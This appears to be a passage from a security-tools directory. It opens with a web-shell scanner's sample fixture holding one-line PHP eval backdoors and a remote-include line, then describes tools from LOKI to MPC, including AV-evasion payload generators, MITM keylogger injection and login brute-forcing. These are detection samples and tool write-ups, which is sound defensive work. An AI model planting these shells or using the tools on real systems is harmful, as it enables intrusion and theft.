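# double-extension upload carrying a base64 blob, a known-hash bot and a
# remote include.
SAMPLE_FILES: Dict[str, bytes] = {
    "/home/alice/public_html/index.php": b"<?php include('header.php'); echo 'welcome'; ?>\n",
    "/home/bob/public_html/uploads/c99.php": b"<?php @eval($_POST['cmd']); ?>\n",
    "/home/bob/public_html/uploads/cat.jpg.php": b"<?php eval(base64_decode('" + base64.b64encode(b"A" * 120) + b"')); ?>\n",
    "/tmp/.x/bot.pl": _KNOWN_BAD,
    "/home/carol/public_html/inc.php": b"<?php include('http://example.invalid/x.txt'); ?>\n",
}

if __name__ == "__main__":
    for path, found in scan_tree(SAMPLE_FILES).items():
        print(f"{severity(found):6} {path} {found}")
```

The sample tree shows why both projects keep several methods side by side: the known bot is caught only by its hash, the renamed shell only by its content, and the base64 blob by neither, which is what the statistical check and the file-name rule are for. It also shows the weakness the LMD text alludes to: a one-byte change defeats the hash check, so hash hits are best treated as confirmation rather than as the only signal.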

Run
  • Download the program archive via the button "Download ZIP" on the right sidebar
  • Unpack LOKI locally
  • Provide the folder to a target system that should be scanned: removable media, network share, folder on target system
  • Right-click on loki.exe and select "Run as Administrator" or open a command line "cmd.exe" as Administrator and run it from there (you can also run LOKI without administrative privileges but some checks will be disabled and relevant objects on disk will not be accessible)

Reports
  • The resulting report will show a GREEN, YELLOW or RED result line.
  • Please analyse the findings yourself by:
    1. Uploading non-confidential samples to Virustotal.com
    2. Searching the web for the file name
    3. Searching the web for keywords from the rule name (e.g. EQUATIONGroupMalware_1 > search for "Equation Group")
    4. Searching the web for the MD5 hash of the sample
  • Please report back false positives via the "Issues" section, which is accessible via the right sidebar (mention the false positive indicator like a hash and/or filename and the rule name that triggered)

Usage

usage: loki.exe [-h] [-p path] [-s kilobyte] [--printAll] [--noprocscan]
                [--nofilescan] [--noindicator] [--debug]

Loki - Simple IOC Scanner

optional arguments:
  -h, --help     show this help message and exit
  -p path        Path to scan
  -s kilobyte    Maximum file site to check in KB (default 2000 KB)
  --printAll     Print all files that are scanned
  --noprocscan   Skip the process scan
  --nofilescan   Skip the file scan
  --noindicator  Do not show a progress indicator
  --debug        Debug output


Download Loki

LUKS-OPs - Automate the usage of LUKS volumes in Linux


A bash script to automate the most basic usage of LUKS volumes in Linux, such as:
  • Creating a virtual disk volume with LUKS format.
  • Mounting an existing LUKS volume.
  • Unmounting a single LUKS volume or all LUKS volumes in the system.

Basic Usage

There is an option for a menu:
./luks-ops.sh menu or simply ./luks-ops.sh

Other options include:
./luks-ops.sh new disk_Name Size_in_numbers
./luks-ops.sh mount /path/to/device (mountpoint) 
./luks-ops.sh unmount-all
./luks-ops.sh clean
./luks-ops.sh usage

Default Options:
  • Virtual-disk size = 512 MB, created in the /usr/ directory
  • Default filesystem used = ext4
  • Cipher options:
    • Creating LUKS1: aes-xts-plain64, Key: 256 bits, LUKS header hashing: sha1, RNG: /dev/urandom
    • plain: aes-cbc-essiv:sha256, Key: 256 bits, Password hashing: ripemd160 (about-time :D)
  • Mounting point = /media/luks_* where * is random-string.
  • Others.. NB. You can change /dev/urandom to /dev/zero (speed?)
Dependencies (install these applications):
  1. dmsetup --- low level logical volume management
  2. cryptsetup --- manage plain dm-crypt and LUKS encrypted volumes

Download LUKS-OPs

Lynis 2.0.0 - Security Auditing Tool for Unix/Linux Systems


Lynis is an open source security auditing tool. Its primary goal is to help users with auditing and hardening Unix and Linux based systems. The software is very flexible and runs on almost every Unix based system (including Mac). Even installing the software itself is optional!

How it works

Lynis performs hundreds of individual tests to determine the security state of the system. Many of these tests are also part of common security guidelines and standards. Examples include searching for installed software and determining possible configuration flaws. Lynis goes further: it also tests individual software components, checks related configuration files and measures performance. After these tests, a scan report is displayed with all discovered findings.

Typical use cases for Lynis:
  • Security auditing
  • Vulnerability scanning
  • System hardening

Requirements:
Privileged or non-privileged


Lynis 2.1.0 - Security Auditing Tool for Unix/Linux Systems


Lynis is an open source security auditing tool. Commonly used by system administrators, security professionals and auditors, to evaluate the security defenses of their Linux/Unix based systems. It runs on the host itself, so it can perform very extensive security scans.

Supported operating systems

The tool has almost no dependencies, therefore it runs on almost all Unix based systems and versions, including:
  • AIX
  • FreeBSD
  • HP-UX
  • Linux
  • Mac OS
  • NetBSD
  • OpenBSD
  • Solaris
  • and others

It even runs on systems like the Raspberry Pi and several storage devices!

No installation required

The tool is very flexible and easy to use. It is one of the few tools in which installation is optional. Just place it on the system, give it a command like "audit system", and it will run. It is written in shell script and released as open source software (GPL).

How it works

Lynis performs hundreds of individual tests to determine the security state of the system. The security scan itself consists of a set of steps, from initializing the program up to the report.

Steps
  1. Determine operating system
  2. Search for available tools and utilities
  3. Check for Lynis update
  4. Run tests from enabled plugins
  5. Run security tests per category
  6. Report status of security scan

During the scan, technical details about the scan are stored in a log file. At the same time, findings (warnings, suggestions, data collection) are stored in a report file.

Opportunistic scanning

Lynis scanning is opportunistic: it uses what it can find.
For example, if it sees you are running Apache, it will perform an initial round of Apache related tests. When, during the Apache scan, it also discovers an SSL/TLS configuration, it will perform additional auditing steps on that. While doing so, it collects discovered certificates, so they can be scanned later as well.

In-depth security scans

By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

Use cases

Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:
  • Security auditing
  • Compliance testing (e.g. PCI, HIPAA, SOx)
  • Vulnerability detection and scanning
  • System hardening

Resources used for testing

Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.
  • Best practices
  • CIS
  • NIST
  • NSA
  • OpenSCAP data
  • Vendor guides and recommendations (e.g. Debian, Gentoo, Red Hat)

Lynis Plugins

Plugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.

Comparison with other tools

Lynis has a different way of doing things, so you have more flexibility. After all, you should be the one deciding what security controls make sense for your environment. We have a small comparison with some other well known tools:

Bastille Linux

Bastille was for a long time the best known utility for hardening Linux systems. It focuses mainly on automatically hardening the system.
Differences with Bastille
Automated hardening tools are helpful, but at the same time might give a false sense of security. Instead of just turning on some settings, Lynis performs an in-depth security scan. You are the one to decide what level of security is appropriate for your environment. After all, not all systems have to be like Fort Knox, unless you want them to be.

Benefits of Lynis
  • Supports more operating systems
  • Won't break your system
  • More in-depth audit


OpenVAS / Nessus

These products focus primarily on vulnerability scanning. They do this via the network by polling services. Optionally they will log in to a system and gather data.
Differences with OpenVAS / Nessus
Lynis runs on the host itself, therefore it can perform a deeper analysis compared with network based scans. Additionally, there is no risk for your business processes, and log files remain clean from connection attempts and incorrect requests.
Although Lynis is an auditing tool, it will actually discover vulnerabilities as well. It does so by using existing tools and analyzing configuration files.
Lynis and OpenVAS are both open source and free to use. Nessus is closed source and paid.

Benefits of Lynis
  • Much faster
  • No pollution of log files, no disruption to business services
  • Host-based scans provide a more in-depth audit

Changelog
Lynis 2.1.0
 = Lynis 2.1.0 (2015-04-16) =

General:
---------
Screen output has been improved to provide additional information.

OS support:
------------
CUPS detection on Mac OS has been improved. AIX systems will now use the csum
utility to create the host ID. Group checks have been altered on AIX to include
-n ALL. The core dump check on Linux is extended to check for actual values
as well.

Software:
----------
McAfee detection has been extended by detecting a running cma binary.
Improved detection of pf firewall on BSD and Mac OS. Security patch checking
with zypper extended.

Session timeout:
-----------------
Tests to determine the shell time out setting have been extended to account for
AIX, HP-UX and other platforms. It will now also determine whether the variable is
exported as a readonly variable. The related compliance section PCI DSS 8.1.8
has been extended.

Documentation:
---------------
- New document: Getting started with Lynis
https://cisofy.com/documentation/lynis/get-started/

Plugins (Enterprise):
----------------------
- Update to file integrity plugin
Changes to PLGN-2606 (capabilities check)

- New configuration plugins:
PLGN-4802 (SSH settings)
PLGN-4804 (login.defs)


Download Lynis 2.1.0

Lynis 2.1.1 - Security Auditing Tool for Unix/Linux Systems


Lynis is an open source security auditing tool. Commonly used by system administrators, security professionals and auditors, to evaluate the security defenses of their Linux/Unix based systems. It runs on the host itself, so it can perform very extensive security scans.

Parameters
--auditor "Given name Surname"   Assign an auditor name to the audit (report)
--checkall, -c                   Start the check
--check-update                   Check if Lynis is up-to-date
--cronjob                        Run Lynis as cronjob (includes -c -Q)
--help, -h                       Shows valid parameters
--manpage                        View man page
--nocolors                       Do not use any colors
--pentest                        Perform a penetration test scan (non-privileged)
--quick, -Q                      Don't wait for user input, except on errors
--quiet                          Only show warnings (includes --quick, but doesn't wait)
--reverse-colors                 Use a different color scheme for lighter backgrounds
--version, -V                    Check program version (and quit)

Changelog
Lynis 2.1.1
=  Lynis 2.1.1 (2015-07-22)  =

    This release adds a lot of improvements, with focus on performance, and
    additional support for common Linux distributions and external utilities.
    We recommend to use this latest version.

    * Operating system enhancements
    -------------------------------
    Support for systems like CentOS, openSUSE, Slackware is improved.

    * Performance
    -------------
    Performance tuning has been applied, to speed up execution of the audit on
    systems with many files. This also includes code cleanups.

    * Automatic updates
    -------------------
    Initial work on an automatic updater has been implemented. This way Lynis
    can be scheduled for automatic updating from a trusted source.

    * Internal functions
    --------------------
    Not all systems have readlink, or the -f option of readlink. The
    ShowSymlinkPath function has been extended with a Python based check, which
    is often available.

    * Software support
    ------------------
    Apache module directory /usr/lib64/apache has been added, which is used on
    openSUSE.

    Support for Chef has been added.

    Added tests for CSF's lfd utility for integrity monitoring on directories and
    files. Related tests are FINT-4334 and FINT-4336.

    Added support for Chrony time daemon and timesync daemon. Additionally NTP
    synchronization status is checked when it is enabled.

    Improved single user mode protection on the rescue.service file.

    * Other
    -------
    Check for user permissions has been extended.
    Python binary is now detected, to help with symlink detection.
    Several new legal terms have been added, for use in banners.
    In several files old tests have been removed, to further clean up the code.

    * Bug fixes
    ---------
    Nginx test showed error when access_log had multiple parameters.
    Tests using locate won't be performed if not present.
    Fix false positive match on Squid unsafe ports [SQD-3624].
    The hardening index is now also inserted into the report if it is not displayed
    on screen.

    * Functions
    ---------
    Added AddSystemGroup function

    * New tests
    ---------
    Several new tests have been added:

    [PKGS-7366] Scan for debsecan utility on Debian systems
    [PKGS-7410] Determine amount of installed kernel packages
    [TIME-3106] Check synchronization status of NTP on systemd based systems
    [CONT-8102] Docker daemon status and gather basic details
    [CONT-8104] Check docker info for any Docker warnings
    [CONT-8106] Check total, running and unused Docker containers

    * Plugins
    ---------

    [PLGN-2602] Disabled by default, as it may be too slow for some machines
    [PLGN-3002] Extended with /sbin/nologin

    * Documentation
    ---------------
    A new document has been created to help with the process of upgrading Lynis.
    It is available at https://cisofy.com/documentation/lynis/upgrading/

  --------------------------------------------------------------


Download Lynis 2.1.1

MALHEUR - Automatic Analysis of Malware Behavior

A novel tool for malware analysis

Malheur is a tool for the automatic analysis of malware behavior (program behavior recorded from malicious software in a sandbox environment). It has been designed to support the regular analysis of malicious software and the development of detection and defense measures. Malheur allows for identifying novel classes of malware with similar behavior and assigning unknown malware to discovered classes.

Analysis of malware behavior?

Malheur builds on the concept of dynamic analysis: Malware binaries are collected in the wild and executed in a sandbox, where their behavior is monitored during run-time. The execution of each malware binary results in a report of recorded behavior. Malheur analyzes these reports for discovery and discrimination of malware classes using machine learning.

Malheur can be applied to recorded behavior in various formats, as long as the monitored events are separated by delimiter symbols, as in the reports generated by the popular malware sandboxes CWSandbox, Anubis, Norman Sandbox and Joebox.


Malheur supports four basic actions for analysis, which can be applied to reports of recorded behavior:
  1. Extraction of prototypes: From a given set of reports, malheur identifies a subset of prototypes representative for the full data set. The prototypes provide a quick overview of recorded behavior and can be used to guide manual inspection.
  2. Clustering of behavior: Malheur automatically identifies groups (clusters) of reports containing similar behavior. Clustering allows for discovering novel classes of malware and provides the basis for crafting specific detection and defense mechanisms, such as anti-virus signatures.
  3. Classification of behavior: Based on a set of previously clustered reports, malheur is able to assign unknown behavior to known groups of malware. Classification enables identifying novel and unknown variants of malware and can be used to filter program behavior prior to manual inspection.
  4. Incremental analysis: Malheur can be applied incrementally for analysis of large data sets. By processing reports in chunks, the run-time as well as memory requirements can be significantly reduced. This renders long-term application of malheur feasible, for example for daily analysis of incoming malware programs.

Dependencies

Debian & Ubuntu Linux
The following packages need to be installed to compile Malheur on Debian and Ubuntu Linux:
  • gcc
  • libconfig9-dev
  • libarchive-dev
For bootstrapping Malheur from the Git repository or changing the automake/autoconf configuration, the following additional packages are necessary:
  • automake
  • autoconf
  • libtool

Mac OS X
To compile Malheur on Mac OS X, a working installation of Xcode including gcc is required. Additionally, the following packages need to be installed via Homebrew:
  • libconfig
  • libarchive (from homebrew-alt)

OpenBSD
To compile Malheur on OpenBSD, the following packages are required. Note that you need to use gmake instead of make to build Malheur.
  • gmake
  • libconfig
  • libarchive
For bootstrapping Malheur from the Git repository, the following packages additionally need to be installed:
  • autoconf
  • automake
  • libtool

Compilation & Installation

From the Git repository, first run:
$ ./bootstrap
From a tarball, run:
$ ./configure [options]
$ make
$ make check
$ make install

Options for configure:
--prefix=PATH           Set directory prefix for installation
By default Malheur is installed into /usr/local. To use a different location, select the installation directory with this option.


Download MALHEUR

Maligno v2.0 - Metasploit Payload Server


Maligno is an open source penetration testing tool written in Python that serves Metasploit payloads. It generates shellcode with msfvenom and transmits it over HTTP or HTTPS. The shellcode is encrypted with AES and encoded prior to transmission.
Maligno also comes with a client tool, which supports HTTP, HTTPS and encryption capabilities. The client is able to connect to Maligno in order to download an encrypted Metasploit payload. Once the shellcode is received, the client will decode it, decrypt it and inject it in the target machine.

The client-server communications can be configured in a way that allows you to simulate specific C&C communications or targeted attacks. In other words, the tool can be used as part of adversary replication engagements.

Are you new to Maligno? Check Maligno Video Series with examples and tutorials.


Changelog: Adversary replication functionality improvements. POST and HEAD method support added, new client profile added, server multithreading support added, perpetual shell mode added, client static HTTP(S) proxy support added, documentation and stability improvements.

Important: Configuration files or profiles made for Maligno v1.x are not compatible with Maligno v2.0.


MalwaRE - Malware Repository Framework


malwaRE is a malware repository website created using the PHP Laravel framework, used to manage your own malware zoo. malwaRE is based on the work of the Adlice team, with some extra features.

If you guys have any improvements, please let me know or send me a pull request.

Features
  • Self-hosted solution (PHP/Mysql server needed)
  • VirusTotal results (option for uploading unknown samples)
  • Search filters available (vendor, filename, hash, tag)
  • Vendor name is picked from VirusTotal results in this order: Microsoft, Kaspersky, Bitdefender
  • Add writeup url(s) for each sample
  • Manage samples by tag
  • Tag autocomplete
  • VirusTotal rescan button (VirusTotal's score column)
  • Download samples from repository

MassBleed - Mass SSL Vulnerability Scanner


USAGE
 sh massbleed.sh [CIDR|IP] [single|port|subnet] [port] [proxy]

ABOUT
This script has four main functions with the ability to proxy all connections:
  1. To mass scan any CIDR range for OpenSSL vulnerabilities via port 443/tcp (https) (example: sh massbleed.sh 192.168.0.0/16)
  2. To scan any CIDR range for OpenSSL vulnerabilities via any custom port specified (example: sh massbleed.sh 192.168.0.0/16 port 8443)
  3. To individually scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh 127.0.0.1 single)
  4. To scan every open port on every host in a single class C subnet for OpenSSL vulnerabilities (example: sh massbleed.sh 192.168.0. subnet)

PROXY: A proxy option has been added to scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work.

PROXY USAGE EXAMPLES:
  • sh massbleed.sh 192.168.0.0/16 0 0 proxy
  • sh massbleed.sh 192.168.0.0/16 port 8443 proxy
  • sh massbleed.sh 127.0.0.1 single 0 proxy
  • sh massbleed.sh 192.168.0. subnet 0 proxy

VULNERABILITIES:
  1. OpenSSL HeartBleed Vulnerability (CVE-2014-0160)
  2. OpenSSL CCS (MITM) Vulnerability (CVE-2014-0224)
  3. Poodle SSLv3 vulnerability (CVE-2014-3566)

Download MassBleed

Medusa - Speedy, Parallel and Modular Login Brute-Forcer


Medusa is intended to be a speedy, massively parallel, modular login brute-forcer. The goal is to support as many services that allow remote authentication as possible. The author considers the following items to be some of the key features of this application:
  • Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently.
  • Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing.
  • Modular design. Each service module exists as an independent .mod file. This means that no modifications are necessary to the core application in order to extend the supported list of services for brute-forcing.

Why?

Why create Medusa? Isn't this the same thing as THC-Hydra? Here are some of the reasons for this application:
  • Application stability. Maybe I'm just lame, but Hydra frequently crashed on me. I was no longer confident that Hydra was actually doing what it claimed to be. Rather than fix Hydra, I decided to create my own buggy application which could crash in new and exciting ways.
  • Code organization. A while back I added several features to Hydra (parallel host scanning, SMBNT module). Retro-fitting the parallel host code to Hydra was a serious pain. This was mainly due to my coding ignorance, but was probably also due to Hydra not being designed from the ground-up to support this. Medusa was designed from the start to support parallel testing of hosts, users and passwords.
  • Speed. Hydra accomplishes its parallel testing by forking off a new process for each host and instance of the service being tested. When testing many hosts/users at once this creates a large amount of overhead as user/password lists must be duplicated for each forked process. Medusa is pthread-based and does not unnecessarily duplicate information.
  • Education. I am not an experienced C programmer, nor do I consider myself an expert in multi-threaded programming. Writing this application was a training exercise for me. Hopefully, the results of it will be useful for others. 

Module specific details:
  • AFP
  • CVS
  • FTP
  • HTTP
  • IMAP
  • MS-SQL
  • MySQL
  • NetWare NCP
  • NNTP
  • PcAnywhere
  • POP3
  • PostgreSQL
  • REXEC
  • RDP
  • RLOGIN
  • RSH
  • SMBNT
  • SMTP-AUTH
  • SMTP-VRFY
  • SNMP
  • SSHv2
  • Subversion (SVN)
  • Telnet
  • VMware Authentication Daemon (vmauthd)
  • VNC
  • Generic Wrapper
  • Web Form

News
2015-06-07: Released Medusa v2.2_rc2
2015-05-28: Released Medusa v2.2_rc1
2012-05-25: Released Medusa v2.1.1
2012-04-02: Released Medusa v2.1
2011-03-04: tak and bigmoneyhat have released a Java-based GUI for Medusa (Medusa-gui)
2010-02-09: Released Medusa v2.0


Download Medusa

Metasploit AV Evasion - Metasploit payload generator that avoids most Anti-Virus products


Metasploit payload generator that avoids most Anti-Virus products.

Installing
git clone https://github.com/nccgroup/metasploitavevasion.git
chmod +x the avoid.sh file before use.

How To Use
./avoid.sh
Then follow the on screen prompts.

Features
  • Easily generate a Metasploit executable payload to bypass Anti-Virus detection
  • Local or remote listener generation
  • Disguises the executable file with a PDF icon
  • Executable opens minimised on the victim's computer
  • Automatically creates AutoRun files for CDROM exploitation

Download Metasploit AV Evasion

MicEnum - Mandatory Integrity Control Enumerator for Windows



In the Microsoft Windows family of operating systems, Mandatory Integrity Control (MIC) is a core security feature introduced in Windows Vista and carried forward in subsequent Windows releases. It adds Integrity Level (IL) based isolation to running processes and objects. The IL represents the level of trustworthiness of an object and may be set on files, folders, etc. Believe it or not, there is no graphical interface for dealing with MIC in Windows. MicEnum has been created to solve this, and as a tool for forensics.

MicEnum is a simple graphical tool that:
  • Enumerates the Integrity Levels of the objects (files and folders) in the hard disks.
  • Enumerates the Integrity Levels in the registry.
  • Helps to detect anomalies in them by spotting different integrity levels.
  • Allows to store and restore this information in an XML file so it may be used for forensic purposes.
  • Allows to set or modify the integrity levels graphically.

MicEnum scanning a folder

How does the tool work?

For now, the only way to show or set Integrity Levels in Windows is icacls.exe, a command line tool. There is no easy or standard way to detect changes or anomalies. As with NTFS permissions, an attacker may have changed the Integrity Level of a file on a system to elevate privileges or support another attack, so watching for such changes and anomalies matters for forensics and for preventive action.

The tool represents files and folders in a tree style. The integrity level of files and folders is shown in a column next to them. By scanning a folder, the tool will check all Integrity Levels and, if any of them does not match with its parent, it will expand it. If you have expanded some folders and want to group back the ones that are known to be the same, just use the checkbox at the bottom. It will hide the folders that are supposed to share same integrity level.

MicEnum scanning a Windows registry branch

For setting new integrity levels, just use the contextual menu again and set the desired level. Do not change them if you do not know what you are doing. You may need administrator privileges to achieve the change.

The program allows to set different integrity levels

For forensic purposes, the whole "session" or information about the integrity levels may be saved as an XML file. Later you may restore it with this same tool. Once restored, icons are missing, and there is no chance to set new values, of course, since you are not using your "live" hard disk.

If a session is loaded, the different values are shown

This all applies to registry branches as well, in the corresponding tab.

MicEnum is inspired by AccessEnum, a classic Sysinternals tool that enumerates NTFS permissions and helps detect anomalies.



MITMf - Framework for Man-In-The-Middle attacks


Framework for Man-In-The-Middle attacks

Available plugins
  • SMBtrap - Exploits the 'SMB Trap' vulnerability on connected clients
  • Screenshotter - Uses HTML5 Canvas to render an accurate screenshot of a clients browser
  • Responder - LLMNR, NBT-NS, WPAD and MDNS poisoner
  • SSLstrip+ - Partially bypass HSTS
  • Spoof - Redirect traffic using ARP spoofing, ICMP redirects or DHCP spoofing
  • BeEFAutorun - Autoruns BeEF modules based on a client's OS or browser type
  • AppCachePoison - Perform app cache poisoning attacks
  • Ferret-NG - Transparently hijacks sessions
  • BrowserProfiler - Attempts to enumerate all browser plugins of connected clients
  • CacheKill - Kills page caching by modifying headers
  • FilePwn - Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
  • Inject - Inject arbitrary content into HTML content
  • BrowserSniper - Performs drive-by attacks on clients with out-of-date browser plugins
  • jskeylogger - Injects a Javascript keylogger into a client's webpages
  • Replace - Replace arbitrary content in HTML content
  • SMBAuth - Evoke SMB challenge-response authentication attempts
  • Upsidedownternet - Flips images 180 degrees

How to install on Kali
apt-get install mitmf


Installation
If MITMf is not in your distro's repo or you just want the latest version:
  • Run the command git clone https://github.com/byt3bl33d3r/MITMf.git to clone this directory
  • Run the setup.sh script
  • Run the command pip install --upgrade -r requirements.txt to install all Python dependencies

On Kali Linux, if you get an error while installing the pypcap package or when starting MITMf you see: ImportError: no module named pcap, run apt-get install python-pypcap to fix it


Download MITMf

MobaXterm - Terminal for Windows with X11 server, tabbed SSH client, network tools and much more...


MobaXterm is your ultimate toolbox for remote computing. In a single Windows application, it provides loads of functions that are tailored for programmers, webmasters, IT administrators and pretty much all users who need to handle their remote jobs in a more simple fashion.

MobaXterm provides all the important remote network tools (SSH, X11, RDP, VNC, FTP, MOSH, ...) and Unix commands (bash, ls, cat, sed, grep, awk, rsync, ...) to Windows desktop, in a single portable exe file which works out of the box.

There are many advantages of having an All-In-One network application for your remote tasks, e.g. when you use SSH to connect to a remote server, a graphical SFTP browser will automatically pop up in order to directly edit your remote files. Your remote applications will also display seamlessly on your Windows desktop using the embedded X server.

You can download and use MobaXterm Home Edition for free. If you want to use it inside your company, you should consider subscribing to MobaXterm Professional Edition: this will give you access to much more features, professional support and "Customizer" software.

When developing MobaXterm, we focused on a simple aim: proposing an intuitive user interface in order for you to efficiently access remote servers through different networks or systems.

Key features

Embedded X server: Fully configured X server based on X.org
Easy DISPLAY exportation: DISPLAY is exported from the remote Unix host to local Windows
X11-Forwarding capability: Your remote display uses SSH for secure transport
Tabbed terminal with SSH: Based on PuTTY/MinTTY with antialiased fonts and macro support
Many Unix/Linux commands on Windows: Includes basic Cygwin commands (bash, grep, awk, sed, rsync, ...)
Add-ons and plugins: You can extend MobaXterm capabilities with plugins
Versatile session manager: All your network tools in one app: Rdp, Vnc, Ssh, Mosh, X11, ...
Portable and light application: MobaXterm has been packaged as a single executable which does not require admin rights and which you can start from a USB stick
Professional application: MobaXterm Professional has been designed for security and stability for very demanding users

MobaXterm plugins

Corkscrew: Corkscrew allows to tunnel TCP connections through HTTP proxies
Curl: Curl is a command line tool for transferring data with URL syntax
CvsClient: A command line tool to access CVS repositories
Gcc, G++ and development tools: the GNU C/C++ compiler and other development tools
DnsUtils: This plugin includes some useful utilities for host name resolution: dig, host, nslookup and nsupdate.
E2fsProgs: Utilities for creating, fixing, configuring, and debugging ext2/3/4 filesystems.
Emacs: The extensible, customizable, self-documenting real-time display editor
Exif: Command-line utility to show EXIF information hidden in JPEG files.
FVWM2: A light but powerful window manager for X11.
File: Determines file type using magic numbers.
Fontforge: A complete font editor with many features
GFortran: The GNU Fortran compiler.
Git: A fast and powerful version control system.
Gvim: The Vim editor with a GTK interface
Httperf: A tool for measuring web server performance.
Joe: Fast and simple editor which emulates 5 other editors.
Lftp: Sophisticated file transfer program and ftp/http/bittorrent client.
Lrzsz: Unix communication package providing the XMODEM, YMODEM and ZMODEM file transfer protocols.
Lynx: A text-mode web browser.
MPlayer: The ultimate video player
Midnight Commander: Midnight Commander is a feature rich text mode visual file manager.
Mosh: MOSH has been included into MobaXterm main executable in version 7.1 directly in the sessions manager. This plugin is deprecated.
Multitail: Program for monitoring multiple log files, in the fashion of the original tail program.
NEdit: NEdit is a multi-purpose text editor for the X Window System.
Node.js: Node.js is a platform built on Chrome's JavaScript runtime for easily building fast, scalable network applications. This plugin does not include NPM.
OpenSSL: A toolkit implementing SSL v2/v3 and TLS protocols.
PdKsh: A KSH shell open-source implementation.
Perl: Larry Wall's Practical Extracting and Report Language
Png2Ico: Png2Ico Converts PNG files to Windows icon resource files.
Python: An interpreted, interactive object-oriented programming language.
Ruby: Interpreted object-oriented scripting language.
Screen: Screen is a terminal multiplexer and window manager that runs many separate 'screens' on a single physical character-based terminal.
Sqlite3: Software library that implements a self-contained, serverless, zero-configuration, transactional SQL database engine.
SquashFS: mksquashfs and unsquashfs tools allow you to create/unpack squashfs filesystems from Windows.
Subversion (SVN): Subversion is a powerful version control system.
Tcl / Tk / Expect: Tcl is a simple-to-learn yet very powerful language. Tk is its graphical toolkit. Expect is an automation tool for terminal.
X11Fonts: Complete set of fonts for X11 server.
X3270Suite: IBM 3270 terminal emulator for Windows.
XServers: Xephyr, Xnest, Xdmx, Xvfb and Xfake alternate X11 servers.
Xmllint: A command line XML tool.
Xorg (legacy): The old X11 (Xorg v1.6.5) server: use this plugin if you have trouble connecting to an old Unix station through XDMCP.
Zip: Zip compression utility.


Download MobaXterm

MobSF (Mobile Security Framework) - Mobile (Android/iOS) Automated Pen-Testing Framework


Mobile Security Framework (MobSF) is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static and dynamic analysis. Until now we have depended on multiple tools to carry out reversing, decoding, debugging, code review and pen-testing, and this process requires a lot of effort and time. Mobile Security Framework can be used for effective and fast security analysis of Android and iOS applications. It supports binaries (APK & IPA) and zipped source code.

The static analyzer is able to perform automated code review, detect insecure permissions and configurations, and detect insecure code such as SSL overriding, SSL bypass, weak crypto, obfuscated code, improper permissions, hardcoded secrets, improper usage of dangerous APIs, leakage of sensitive/PII information, and insecure file storage. The dynamic analyzer runs the application in a VM or on a configured device and detects issues at run time. Further analysis is done on the captured network packets, decrypted HTTPS traffic, application dumps, logs, error or crash reports, debug information, stack traces, and on application assets like settings files, preferences, and databases. The framework is highly extensible: you can add your own custom rules with ease. A quick and clean report can be generated at the end of the tests. We will be extending this framework to support other mobile platforms like Tizen, WindowsPhone etc. in future.

Documentation

Queries

Screenshots and Sample Report

Static Analysis - Android APK

Static Analysis - iOS IPA

Sample Report: http://opensecurity.in/research/security-analysis-of-android-browsers.html

v0.8.8 Changelog
  • New name: Mobile Security Framework (MobSF)
  • Added Dynamic Analysis
  • VM Available for Download
  • Fixed RCE
  • Fixed Broken Manifest File Parsing Logic
  • Sqlite DB Support
  • Fixed Reporting with new PDF report
  • Rescan Option
  • Detect Root Detection
  • Added Requirements.txt
  • Automated Java Path Detection
  • Improved Manifest and Code Analysis
  • Fixed Unzipping error for Unix.
  • Activity Tester Module
  • Exported Activity Tester Module
  • Device API Hooker with DroidMon
  • SSL Certificate Pinning Bypass with JustTrustMe
  • RootCloak to prevent root Detection
  • Data Pusher to Dump Application Data
  • pyWebproxy to decrypt SSL Traffic

v0.8.7 Changelog
  • Improved Static Analysis Rules
  • Better AndroidManifest View
  • Search in Files

v0.8.6 Changelog
  • Detects implicitly exported component from manifest.
  • Added CFR decompiler support
  • Fixed Regex DoS on URL Regex

v0.8.5 Changelog
  • Bug Fix to support IPA MIME Type: application/x-itunes-ipa

v0.8.4 Changelog
  • Improved Android Static Code Analysis speed (2X performance)
  • Static Code analysis on Dexguard protected APK.
  • Fixed a Security Issue - Email Regex DoS.
  • Added Logging Code.
  • All Browser Support.
  • MIME Type Bug fix to Support IE.
  • Fixed Progress Bar.

v0.8.3 Changelog
  • View AndroidManifest.xml & Info.plist
  • Supports iOS Binary (IPA)
  • Bug Fix for Linux (Ubuntu), missing MIME Type Detection
  • Check for Hardcoded Certificates
  • Added Code to prevent from Directory Traversal

Credits
  • Bharadwaj Machiraju (@tunnelshade_) - For writing pyWebProxy from scratch
  • Thomas Abraham - For JS Hacks on UI.
  • Anto Joseph (@antojosep007) - For the help with SuperSU.
  • Tim Brown (@timb_machine) - For the iOS Binary Analysis Ruleset.
  • Abhinav Sejpal (@Abhinav_Sejpal) - For poking me with bugs and feature requests.
  • Anant Srivastava (@anantshri) - For Activity Tester Idea


Download Mobile-Security-Framework-Mobsf

Mosca - Static Analysis Tool To Find Bugs



Just another simple static analysis tool to find bugs, working like the Unix grep command. Mosca has modules called eggs; each egg is a simple config to find bugs in a specific language like PHP, Ruby, ASP etc. Example egg configs are in the "egg" directory. If Mosca reads a line of source code that matches a vulnerability pattern from an egg, it alerts about the vulnerability and saves it to the logs.


Download Mosca

MPC - Msfvenom Payload Creator


Msfvenom Payload Creator (MPC) is a wrapper to generate multiple types of payloads, based on the user's choice. The idea is to be as simple as possible (only requiring one input) to produce the payload.

Fully automating msfvenom & Metasploit is the end goal (as well as being able to automate MPC itself). The rest is to make the user's life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and being able to enter any argument in any order (in various formats/patterns)).

The only necessary input from the user should be defining the payload they want by either the platform (e.g. windows), or the file extension they wish the payload to have (e.g. exe).
  • Can't remember your IP for an interface? Don't sweat it, just use the interface name: eth0.
  • Don't know what your external IP is? MPC will discover it: wan.
  • Want to generate one of each payload? No issue! Try: loop.
